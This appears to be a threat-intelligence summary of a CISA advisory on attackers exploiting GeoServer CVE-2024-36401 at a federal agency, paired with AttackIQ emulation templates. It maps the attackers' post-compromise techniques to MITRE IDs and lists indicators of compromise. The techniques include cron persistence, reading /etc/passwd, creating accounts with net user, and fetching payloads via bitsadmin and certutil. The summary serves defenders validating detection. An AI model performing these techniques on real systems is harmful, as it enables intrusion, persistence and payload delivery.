CISA released an advisory detailing an incident at a U.S. federal civilian executive branch agency where attackers exploited CVE-2024-36401 in GeoServer to achieve remote code execution, remain undetected for nearly three weeks, and perform lateral movement. AttackIQ published assessment templates emulating the post-compromise TTPs (Linux and Windows) from CISA AA25-266A to help organizations validate detection, response, and prevention controls. #CVE-2024-36401 #GeoServer
Keypoints
- CISA’s advisory (AA25-266A) describes a breach where an unpatched GeoServer vulnerability (CVE-2024-36401) allowed unauthenticated RCE and subsequent intrusions on July 11 and July 24, 2024.
- The vulnerability had been publicly disclosed June 30, 2024, and listed in CISA’s Known Exploited Vulnerabilities catalog on July 15, 2024, but the FCEB agency had not patched it.
- Attackers operated undetected for nearly three weeks, conducting lateral movement and post-compromise activities across Linux and Windows hosts.
- CISA emphasizes prompt patching of known exploited vulnerabilities, exercising incident response plans, and implementing centralized, out-of-band logging and continuous monitoring.
- AttackIQ released Linux and Windows assessment templates that emulate the GeoServer and SQL Server post-compromise TTPs to validate controls for persistence, discovery, and command-and-control behaviors.
- Linux TTPs in the template include cron persistence, system discovery commands (df, ps aux, uname, ifconfig, who), and delivery of known samples (Stowaway proxy and a 2017 Linux exploit).
- Windows TTPs include account creation, discovery via netstat/net/group/net user, systeminfo, certutil/ping internet checks, tasklist/process discovery, ipconfig, and BITS-based payload retrieval.
MITRE Techniques
- [T1053.003] Cron Job Persistence and Execution – cron was used to schedule commands for recurring execution (“Cron Job Persistence and Execution (T1053.003): This scenario used the cron utility to schedule commands for initial or recurring execution.”)
- [T1082] System Information Discovery – commands like df and uname were executed to obtain disk and system information (“Obtain Disk Space using “df” Command (T1082): This scenario executes df command…”; “Obtain System Information using “uname” Command (T1082): This scenario executes the uname -a command…”)
- [T1057] Process Discovery – adversaries enumerated running processes using ps aux / tasklist (“Process Discovery using “ps aux” Command (T1057): This scenario executes ps -aux command…”; “Process Discovery Through Tasklist (T1057): This scenario enumerates processes…”)
- [T1087.001] Account Discovery – local accounts were enumerated via cat /etc/passwd and net user (“Account Discovery (T1087.001): This scenario executes the cat /etc/passwd command…”; “Enumerate Local System Accounts via net Command (T1087.001): This scenario executes the net user command…”)
- [T1016] System Network Configuration Discovery – ifconfig and ipconfig were used to collect network adapter and configuration information (“System Network Configuration Discovery through Linux Command Line (T1016): This scenario executes ifconfig…”; “Get IP Information through Windows Command Line (T1016): This scenario executes the ipconfig /all…”)
- [T1124] System Time Discovery – date and who -b were used to obtain system date and last boot time (“Obtain System Date using “date” Command (T1124): This scenario executes the date command…”; “Obtain Last System Boot using “who” Command (T1124): This scenario executes the who -b command…”)
- [T1136.001] Create Account – net user was used to create a new user to maintain access (“Create Account (T1136.001): This scenario attempts to create a new user into the system with the net user Windows command.”)
- [T1049] System Network Connections Discovery – netstat was used to enumerate active connections and listening services (“System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat…”)
- [T1087.002] Domain Account Discovery – net group was used to list domain administrator accounts (“Domain Administrator Accounts Discovery Via Net Command Script (T1087.002): This scenario executes net group command…”)
- [T1033] Account Discovery (whoami) – whoami was executed to obtain the running user account identity (“Obtain Username using “whoami” Command (T1033): This scenario executes the native whoami command…”)
- [T1083] File and Directory Discovery – dir was executed to enumerate files and directories (“File and Directory Discovery Script (T1083): This scenario executes the native dir command…”)
- [T1016.001] Internet Connection Discovery – certutil and ping were used to test Internet connectivity and try downloading files (“Internet Connection Discovery using certutil Command (T1016.001): This scenario executes the certutil utility…”; “Internet Connection Discovery via ping to 8.8.8.8 (T1016.001): This scenario executes ping command…”)
- [T1197] BITS Jobs – bitsadmin was used to create a BITS job to download a remote payload as a covert C2/data retrieval method (“BITS Jobs Script (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload.”)
Indicators of Compromise
- [File Hash] malicious sample hashes – dff3e75f2f72f8123be76f010d7bd71f5f7508dfac84b2b52a721e779abc50c9 (Stowaway Proxy sample), 42202a67748c6a5eb735e8241ef144462d9323894579a2f063fa2f82c91eca08 (2017 Linux exploit)
- [CVE] exploited vulnerability – CVE-2024-36401 (GeoServer unauthenticated RCE)
- [Product/Service] affected software – GeoServer (vulnerable to CVE-2024-36401), SQL Server behaviors emulated in Windows template
- [Commands/Artifacts] evidence of post-compromise commands – examples include cron entries, df / ps aux / uname / ifconfig outputs, net user / net group / netstat / certutil usage
Read more: https://www.attackiq.com/2025/09/24/response-to-cisa-advisory-aa25-266a/